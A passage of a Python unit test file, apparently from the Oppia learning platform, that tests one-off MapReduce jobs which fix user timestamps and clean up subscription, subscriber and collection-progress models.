owner_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNotNone(owner_settings.last_created_an_exploration)
self.assertIsNotNone(owner_settings.last_edited_an_exploration)
def test_that_last_edited_time_is_updated(self):
self.login(self.OWNER_EMAIL)
self.save_new_valid_exploration(
self.exp_id, self.owner_id, end_state_name='End')
self.logout()
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.editor_id, self.exp_id, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
self.logout()
user_models.UserSettingsModel(
id=self.editor_id,
email=self.EDITOR_EMAIL,
last_edited_an_exploration=None
).put()
editor_settings = user_services.get_user_settings(self.editor_id)
self.assertIsNone(editor_settings.last_created_an_exploration)
self.assertIsNone(editor_settings.last_edited_an_exploration)
self._run_one_off_job()
editor_settings = user_services.get_user_settings(self.editor_id)
self.assertIsNotNone(editor_settings.last_edited_an_exploration)
self.assertIsNone(editor_settings.last_created_an_exploration)
def test_that_last_edited_and_created_time_both_updated(self):
self.login(self.OWNER_EMAIL)
self.save_new_valid_exploration(
self.exp_id, self.owner_id, end_state_name='End')
exp_services.update_exploration(
self.owner_id, self.exp_id, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
self.logout()
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.editor_id, self.exp_id, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'new objective'
})], 'Test edit new')
self.logout()
user_models.UserSettingsModel(
id=self.owner_id,
email=self.OWNER_EMAIL,
last_created_an_exploration=None,
last_edited_an_exploration=None
).put()
user_models.UserSettingsModel(
id=self.editor_id,
email=self.EDITOR_EMAIL,
last_edited_an_exploration=None
).put()
owner_settings = user_services.get_user_settings(self.owner_id)
editor_settings = user_services.get_user_settings(self.editor_id)
self.assertIsNone(owner_settings.last_created_an_exploration)
self.assertIsNone(owner_settings.last_edited_an_exploration)
self.assertIsNone(editor_settings.last_created_an_exploration)
self.assertIsNone(editor_settings.last_edited_an_exploration)
self._run_one_off_job()
owner_settings = user_services.get_user_settings(self.owner_id)
editor_settings = user_services.get_user_settings(self.editor_id)
self.assertIsNotNone(owner_settings.last_edited_an_exploration)
self.assertIsNotNone(owner_settings.last_created_an_exploration)
self.assertIsNotNone(editor_settings.last_edited_an_exploration)
self.assertIsNone(editor_settings.last_created_an_exploration)
def test_that_last_edited_and_created_time_are_not_updated(self):
user_models.UserSettingsModel(
id=self.owner_id,
email=self.OWNER_EMAIL,
last_created_an_exploration=None,
last_edited_an_exploration=None
).put()
owner_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNone(owner_settings.last_created_an_exploration)
self.assertIsNone(owner_settings.last_edited_an_exploration)
self._run_one_off_job()
owner_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNone(owner_settings.last_created_an_exploration)
self.assertIsNone(owner_settings.last_edited_an_exploration)
class CleanupUserSubscriptionsModelUnitTests(test_utils.GenericTestBase):
def setUp(self):
super(CleanupUserSubscriptionsModelUnitTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup('user@email', 'user')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email('user@email')
self.owner = user_services.get_user_actions_info(self.owner_id)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i
) for i in python_utils.RANGE(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.publish_exploration(self.owner, exp.id)
for exp in explorations:
subscription_services.subscribe_to_exploration(
self.user_id, exp.id)
self.process_and_flush_pending_mapreduce_tasks()
def test_standard_operation(self):
for exp_id in python_utils.RANGE(3):
exp_models.ExplorationModel.get('%s' % exp_id).delete(
self.owner_id, 'deleted exploration')
owner_subscription_model = user_models.UserSubscriptionsModel.get(
self.owner_id)
self.assertEqual(len(owner_subscription_model.exploration_ids), 3)
user_subscription_model = user_models.UserSubscriptionsModel.get(
self.user_id)
self.assertEqual(len(user_subscription_model.exploration_ids), 3)
job = (
user_jobs_one_off
.CleanupExplorationIdsFromUserSubscriptionsModelOneOffJob
)
job_id = job.create_new()
job.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
owner_subscription_model = user_models.UserSubscriptionsModel.get(
self.owner_id)
self.assertEqual(len(owner_subscription_model.exploration_ids), 0)
user_subscription_model = user_models.UserSubscriptionsModel.get(
self.user_id)
self.assertEqual(len(user_subscription_model.exploration_ids), 0)
actual_output = job.get_output(job_id)
expected_output = [
u'[u\'Successfully cleaned up UserSubscriptionsModel %s and '
'removed explorations 0, 1, 2\', 1]' %
self.owner_id,
u'[u\'Successfully cleaned up UserSubscriptionsModel %s and '
'removed explorations 0, 1, 2\', 1]' %
self.user_id]
self.assertEqual(sorted(actual_output), sorted(expected_output))
class MockUserSettingsModelWithGaeUserId(user_models.UserSettingsModel):
"""Mock UserSettingsModel so that it allows to set `gae_user_id`."""
gae_user_id = (
datastore_services.StringProperty(indexed=True, required=False))
class MockUserSettingsModelWithGaeId(user_models.UserSettingsModel):
"""Mock UserSettingsModel so that it allows to set `gae_id`."""
gae_id = (
datastore_services.StringProperty(indexed=True, required=True))
class MockUserSubscriptionsModelWithActivityIDs(
user_models.UserSubscriptionsModel):
"""Mock UserSubscriptionsModel so that it allows to set 'activity_ids'. """
activity_ids = (
datastore_services.StringProperty(indexed=True, repeated=True))
class RemoveActivityIDsOneOffJobTests(test_utils.GenericTestBase):
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.RemoveActivityIDsOneOffJob.create_new())
user_jobs_one_off.RemoveActivityIDsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.RemoveActivityIDsOneOffJob
.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
return eval_output
def test_one_subscription_model_with_activity_ids(self):
with self.swap(
user_models, 'UserSubscriptionsModel',
MockUserSubscriptionsModelWithActivityIDs):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id',
activity_ids=['exp_1', 'exp_2', 'exp_3']
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertIsNotNone(
original_subscription_model.activity_ids)
self.assertIn(
'activity_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertIn(
'activity_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'activity_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
def test_one_subscription_model_without_activity_ids(self):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id'
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertNotIn(
'activity_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_ALREADY_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'activity_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
def test_rerun(self):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id'
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertNotIn(
'activity_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_ALREADY_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'activity_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_ALREADY_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'activity_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
class MockUserSubscriptionsModelWithFeedbackThreadIDs(
user_models.UserSubscriptionsModel):
"""Mock UserSubscriptionsModel so that it allows to set
`feedback_thread_ids`.
"""
feedback_thread_ids = (
datastore_services.StringProperty(indexed=True, repeated=True))
class RemoveFeedbackThreadIDsOneOffJobTests(test_utils.GenericTestBase):
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.create_new())
user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob
.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
return eval_output
def test_one_subscription_model_with_feedback_thread_ids(self):
with self.swap(
user_models, 'UserSubscriptionsModel',
MockUserSubscriptionsModelWithFeedbackThreadIDs):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id',
feedback_thread_ids=['some_id']
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertIsNotNone(
original_subscription_model.feedback_thread_ids)
self.assertIn(
'feedback_thread_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertIn(
'feedback_thread_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'feedback_thread_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'feedback_thread_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
def test_one_subscription_model_without_feedback_thread_ids(self):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id'
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertNotIn(
'feedback_thread_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'feedback_thread_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_ALREADY_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'feedback_thread_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'feedback_thread_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
class FixUserSettingsCreatedOnOneOffJobTests(test_utils.GenericTestBase):
AUTO_CREATE_DEFAULT_SUPERADMIN_USER = False
USER_ID_1 = 'user_id'
USER_ID_2 = 'user_id_2'
EMAIL_1 = '<EMAIL>'
EMAIL_2 = '<EMAIL>'
SKILL_ID_1 = 'skill_id_1'
SKILL_ID_2 = 'skill_id_2'
DEGREE_OF_MASTERY = 0.5
EXPLORATION_IDS = ['exp_1', 'exp_2', 'exp_3']
COLLECTION_IDS = ['col_1', 'col_2', 'col_3']
EXP_ID_ONE = 'exp_id_one'
EXP_ID_TWO = 'exp_id_two'
EXP_ID_THREE = 'exp_id_three'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.create_new())
user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob
.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
sorted_eval_output = []
for key, values in eval_output:
if key == 'ERROR_NOT_UP_TO_DATE_USER':
values.sort()
sorted_eval_output.append([key, values])
return sorted_eval_output
def test_update_user_model_using_all_user_settings_model_attributes(self):
user_settings_model = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
user_settings_model.update_timestamps()
original_created_on_timestamp = user_settings_model.created_on
# last_agreed_to_terms is set to have the absolute minimum
# timestamp value.
user_settings_model.last_agreed_to_terms = (
original_created_on_timestamp + datetime.timedelta(hours=2))
final_created_on_timestamp = user_settings_model.last_agreed_to_terms
user_settings_model.created_on = (
final_created_on_timestamp + datetime.timedelta(days=10))
user_settings_model.last_logged_in = (
final_created_on_timestamp + datetime.timedelta(minutes=1))
user_settings_model.last_started_state_editor_tutorial = (
final_created_on_timestamp + datetime.timedelta(minutes=3))
user_settings_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=12))
user_settings_model.last_started_state_translation_tutorial = (
final_created_on_timestamp + datetime.timedelta(hours=14))
user_settings_model.last_edited_an_exploration = (
final_created_on_timestamp + datetime.timedelta(hours=15))
user_settings_model.last_created_an_exploration = (
final_created_on_timestamp + datetime.timedelta(hours=16))
user_settings_model.first_contribution_msec = (
utils.get_time_in_millisecs(
final_created_on_timestamp + datetime.timedelta(hours=10))
)
user_settings_model.put()
expected_output = [
[
'SUCCESS_UPDATED_USING_UserSettingsModel_last_agreed_to_terms',
1
],
['ERROR_NOT_UP_TO_DATE_USER', [self.USER_ID_1]]
]
self.assertLess(
final_created_on_timestamp, user_settings_model.created_on)
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
migrated_user_model = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_1))
self.assertEqual(
migrated_user_model.created_on, final_created_on_timestamp)
def test_update_using_datetime_attributes_of_all_other_models(self):
user_subscriptions_model = user_models.UserSubscriptionsModel(
id=self.USER_ID_1)
user_subscriptions_model.update_timestamps()
# We are sequentially creating the models, so the timestamps will
# be in increasing order, and hence created_on attribute for
# user_subscriptions_model will have the smallest timestamp value.
final_created_on_timestamp = user_subscriptions_model.created_on
user_subscriptions_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=2)
)
user_subscriptions_model.last_checked = (
final_created_on_timestamp + datetime.timedelta(hours=3)
)
user_subscriptions_model.put()
user_settings_model = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
user_settings_model.update_timestamps()
user_settings_model.created_on = (
final_created_on_timestamp + datetime.timedelta(hours=10)
)
user_settings_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=10)
)
user_settings_model.put()
exploration_user_data_model = user_models.ExplorationUserDataModel(
id='%s.%s' % (self.USER_ID_1, self.EXP_ID_ONE),
user_id=self.USER_ID_1,
exploration_id=self.EXP_ID_ONE,
rating=2,
rated_on=final_created_on_timestamp + datetime.timedelta(hours=1),
draft_change_list={'new_content': {}},
draft_change_list_last_updated=(
final_created_on_timestamp + datetime.timedelta(hours=2)),
draft_change_list_exp_version=3,
draft_change_list_id=1
)
exploration_user_data_model.update_timestamps()
exploration_user_data_model.created_on = (
final_created_on_timestamp + datetime.timedelta(hours=5)
)
exploration_user_data_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=5)
)
exploration_user_data_model.put()
user_contributions_model = user_models.UserContributionsModel(
id=self.USER_ID_1)
user_contributions_model.update_timestamps()
user_contributions_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=5)
)
user_contributions_model.put()
user_email_preferences_model = user_models.UserEmailPreferencesModel(
id=self.USER_ID_1)
user_email_preferences_model.update_timestamps()
user_email_preferences_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=6)
)
user_email_preferences_model.put()
user_stats_model = user_models.UserStatsModel(
id=self.USER_ID_1)
user_stats_model.update_timestamps()
user_stats_model.created_on = (
final_created_on_timestamp + datetime.timedelta(hours=10)
)
user_stats_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=10)
)
user_stats_model.put()
expected_output = [
[
'SUCCESS_UPDATED_USING_UserSubscriptionsModel_created_on', 1
],
['ERROR_NOT_UP_TO_DATE_USER', [self.USER_ID_1]]
]
self.assertLess(
final_created_on_timestamp, user_settings_model.created_on)
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
migrated_user_model = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_1))
self.assertEqual(
migrated_user_model.created_on, final_created_on_timestamp)
def test_time_difference_less_than_time_delta_does_not_update(self):
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
user_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
user_auth_details_model = (
auth_models.UserAuthDetailsModel.get(user_id))
user_auth_details_model.update_timestamps()
user_auth_details_model.put()
user_settings_model = (
user_models.UserSettingsModel(
id=user_id,
email=self.NEW_USER_EMAIL,
)
)
user_settings_model.update_timestamps()
user_settings_model.put()
# UserAuthDetails model was created before UserSettingsModel, but the
# time difference is less than the time_delta required (will be less
# than a second here), hence created_on will not be updated.
self.assertLess(
user_auth_details_model.created_on, user_settings_model.created_on)
expected_output = [['SUCCESS_ALREADY_UP_TO_DATE', 1]]
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
migrated_user_model = (
user_models.UserSettingsModel.get_by_id(user_id))
self.assertNotEqual(
migrated_user_model.created_on, user_auth_details_model.created_on)
def test_update_for_multiple_users_works_correctly(self):
user_settings_model_1 = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
user_settings_model_1.update_timestamps()
user_settings_model_1.created_on += datetime.timedelta(hours=10)
final_created_on_timestamp_1 = user_settings_model_1.last_updated
user_settings_model_1.put()
user_settings_model_2 = (
user_models.UserSettingsModel(
id=self.USER_ID_2,
email=self.EMAIL_2,
)
)
user_settings_model_2.update_timestamps()
original_created_on_timestamp_2 = user_settings_model_2.created_on
user_settings_model_2.created_on = (
original_created_on_timestamp_2 + datetime.timedelta(hours=5))
user_settings_model_2.last_updated = (
original_created_on_timestamp_2 + datetime.timedelta(hours=6))
user_settings_model_2.last_logged_in = (
original_created_on_timestamp_2 + datetime.timedelta(hours=1))
final_created_on_timestamp_2 = user_settings_model_2.last_logged_in
user_settings_model_2.put()
expected_output = [
['SUCCESS_UPDATED_USING_UserSettingsModel_last_updated', 1],
['SUCCESS_UPDATED_USING_UserSettingsModel_last_logged_in', 1],
['ERROR_NOT_UP_TO_DATE_USER', [self.USER_ID_1, self.USER_ID_2]]
]
self.assertLess(
final_created_on_timestamp_1, user_settings_model_1.created_on)
self.assertLess(
final_created_on_timestamp_2, user_settings_model_2.created_on)
actual_output = self._run_one_off_job()
self.assertItemsEqual(actual_output, expected_output)
migrated_user_model_1 = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_1))
migrated_user_model_2 = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_2))
self.assertEqual(
migrated_user_model_1.created_on, final_created_on_timestamp_1)
self.assertEqual(
migrated_user_model_2.created_on, final_created_on_timestamp_2)
def test_multiple_runs_of_one_off_job_works_correctly(self):
user_settings_model_1 = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
user_settings_model_1.update_timestamps()
user_settings_model_1.created_on += datetime.timedelta(hours=10)
final_created_on_timestamp_1 = user_settings_model_1.last_updated
user_settings_model_1.put()
user_settings_model_2 = (
user_models.UserSettingsModel(
id=self.USER_ID_2,
email=self.EMAIL_2,
)
)
user_settings_model_2.update_timestamps()
user_settings_model_2.created_on += datetime.timedelta(hours=5)
final_created_on_timestamp_2 = user_settings_model_2.last_updated
user_settings_model_2.put()
expected_output = [['SUCCESS_ALREADY_UP_TO_DATE', 2]]
self.assertLess(
final_created_on_timestamp_1, user_settings_model_1.created_on)
self.assertLess(
final_created_on_timestamp_2, user_settings_model_2.created_on)
actual_output = self._run_one_off_job()
actual_output = self._run_one_off_job()
self.assertItemsEqual(actual_output, expected_output)
migrated_user_model_1 = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_1))
migrated_user_model_2 = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_2))
self.assertEqual(
migrated_user_model_1.created_on, final_created_on_timestamp_1)
self.assertEqual(
migrated_user_model_2.created_on, final_created_on_timestamp_2)
class UserSettingsCreatedOnAuditOneOffJobTests(test_utils.GenericTestBase):
AUTO_CREATE_DEFAULT_SUPERADMIN_USER = False
USER_ID_1 = 'user_id'
USER_ID_2 = 'user_id_2'
EMAIL_1 = '<EMAIL>'
EMAIL_2 = '<EMAIL>'
SKILL_ID_1 = 'skill_id_1'
SKILL_ID_2 = 'skill_id_2'
DEGREE_OF_MASTERY = 0.5
EXPLORATION_IDS = ['exp_1', 'exp_2', 'exp_3']
COLLECTION_IDS = ['col_1', 'col_2', 'col_3']
EXP_ID_ONE = 'exp_id_one'
EXP_ID_TWO = 'exp_id_two'
EXP_ID_THREE = 'exp_id_three'
def setUp(self):
super(UserSettingsCreatedOnAuditOneOffJobTests, self).setUp()
self.user_settings_model = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
self.user_settings_model.update_timestamps()
self.lowest_timestamp = self.user_settings_model.created_on
self.user_settings_model.last_agreed_to_terms = (
self.lowest_timestamp + datetime.timedelta(hours=2))
self.user_settings_model.last_logged_in = (
self.lowest_timestamp + datetime.timedelta(minutes=1))
self.user_settings_model.last_started_state_editor_tutorial = (
self.lowest_timestamp + datetime.timedelta(minutes=3))
self.user_settings_model.last_started_state_translation_tutorial = (
self.lowest_timestamp + datetime.timedelta(hours=14))
self.user_settings_model.last_edited_an_exploration = (
self.lowest_timestamp + datetime.timedelta(hours=15))
self.user_settings_model.last_created_an_exploration = (
self.lowest_timestamp + datetime.timedelta(hours=16))
self.user_settings_model.first_contribution_msec = (
utils.get_time_in_millisecs(
self.lowest_timestamp + datetime.timedelta(
hours=10)
)
)
self.user_settings_model.put()
self.user_subscriptions_model = user_models.UserSubscriptionsModel(
id=self.USER_ID_1)
self.user_subscriptions_model.update_timestamps()
self.user_subscriptions_model.last_checked = (
self.lowest_timestamp + datetime.timedelta(hours=1)
)
self.user_subscriptions_model.put()
self.exploration_user_data_model = user_models.ExplorationUserDataModel(
id='%s.%s' % (self.USER_ID_1, self.EXP_ID_ONE),
user_id=self.USER_ID_1,
exploration_id=self.EXP_ID_ONE,
rating=2,
rated_on=self.lowest_timestamp + datetime.timedelta(hours=1),
draft_change_list={'new_content': {}},
draft_change_list_last_updated=(
self.lowest_timestamp + datetime.timedelta(hours=2)),
draft_change_list_exp_version=3,
draft_change_list_id=1
)
self.exploration_user_data_model.update_timestamps()
self.exploration_user_data_model.put()
self.user_contributions_model = user_models.UserContributionsModel(
id=self.USER_ID_1)
self.user_contributions_model.update_timestamps()
self.user_contributions_model.put()
self.user_email_preferences_model = (
user_models.UserEmailPreferencesModel(id=self.USER_ID_1))
self.user_email_preferences_model.update_timestamps()
self.user_email_preferences_model.put()
self.user_stats_model = user_models.UserStatsModel(
id=self.USER_ID_1)
self.user_stats_model.update_timestamps()
self.user_stats_model.put()
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.create_new())
user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.UserSettingsCreatedOnAuditOneOffJob
.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
return eval_output
def test_created_on_having_lowest_value_timestamp_yields_success(self):
self.assertEqual(
self.lowest_timestamp, self.user_settings_model.created_on)
expected_output = [['SUCCESS_ALREADY_UP_TO_DATE', 1]]
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
def test_created_on_within_delta_from_lowest_value_yields_success(self):
self.user_settings_model.update_timestamps(
update_last_updated_time=False)
self.user_settings_model.created_on += datetime.timedelta(minutes=5)
self.user_settings_model.put()
self.assertLess(
self.lowest_timestamp, self.user_settings_model.created_on)
expected_output = [['SUCCESS_ALREADY_UP_TO_DATE', 1]]
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
def test_created_on_greater_than_delta_from_lowest_value_yields_error(self):
self.user_settings_model.update_timestamps(
update_last_updated_time=False)
self.user_settings_model.created_on += datetime.timedelta(minutes=6)
self.user_settings_model.put()
# Since last_updated of user_settings_model was never changed, hence
# it remains the lowest timestamp value among all attributes.
self.lowest_timestamp = self.user_settings_model.last_updated
self.assertLess(
self.lowest_timestamp,
self.user_settings_model.created_on - datetime.timedelta(minutes=5))
expected_output = [
[
'ERROR_NEED_TO_UPDATE_USING_UserSettingsModel_last_updated',
[self.USER_ID_1]
]]
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
def test_update_for_multiple_users_works_correctly(self):
user_settings_model_2 = (
user_models.UserSettingsModel(
id=self.USER_ID_2,
email=self.EMAIL_2,
)
)
user_settings_model_2.update_timestamps()
user_settings_model_2.created_on += datetime.timedelta(hours=10)
user_settings_model_2.put()
expected_output = [
['SUCCESS_ALREADY_UP_TO_DATE', 1],
[
'ERROR_NEED_TO_UPDATE_USING_UserSettingsModel_last_updated',
[self.USER_ID_2]
]
]
actual_output = self._run_one_off_job()
self.assertItemsEqual(actual_output, expected_output)
class CleanUpUserSubscribersModelOneOffJobTests(test_utils.GenericTestBase):
def setUp(self):
super(CleanUpUserSubscribersModelOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup('user@email', 'user')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email('user@email')
subscription_services.subscribe_to_creator(self.user_id, self.owner_id)
self.model_instance = user_models.UserSubscribersModel.get_by_id(
self.owner_id)
self.process_and_flush_pending_mapreduce_tasks()
def test_standard_operation(self):
job_id = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output(
job_id))
self.assertEqual(output, [])
def test_migration_job_skips_deleted_model(self):
self.model_instance.subscriber_ids.append(self.owner_id)
self.model_instance.deleted = True
self.model_instance.update_timestamps()
self.model_instance.put()
job_id = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output(
job_id))
self.assertEqual(output, [])
def test_job_removes_user_id_from_subscriber_ids(self):
self.model_instance.subscriber_ids.append(self.owner_id)
self.model_instance.update_timestamps()
self.model_instance.put()
job_id = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.get_output(
job_id))
self.assertEqual(
output, [
'[u\'Removed user from their own subscribers list\', '
'[u\'%s\']]' % self.owner_id])
self.model_instance = user_models.UserSubscribersModel.get_by_id(
self.owner_id)
self.assertTrue(self.user_id in self.model_instance.subscriber_ids)
self.assertTrue(self.owner_id not in self.model_instance.subscriber_ids)
class CleanUpCollectionProgressModelOneOffJobTests(test_utils.GenericTestBase):
def setUp(self):
super(CleanUpCollectionProgressModelOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.set_admins([self.OWNER_USERNAME])
self.owner = user_services.get_user_actions_info(self.owner_id)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i
) for i in python_utils.RANGE(3)]
collection = collection_domain.Collection.create_default_collection(
'col')
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.publish_exploration(self.owner, exp.id)
collection.add_node(exp.id)
collection_services.save_new_collection(self.owner_id, collection)
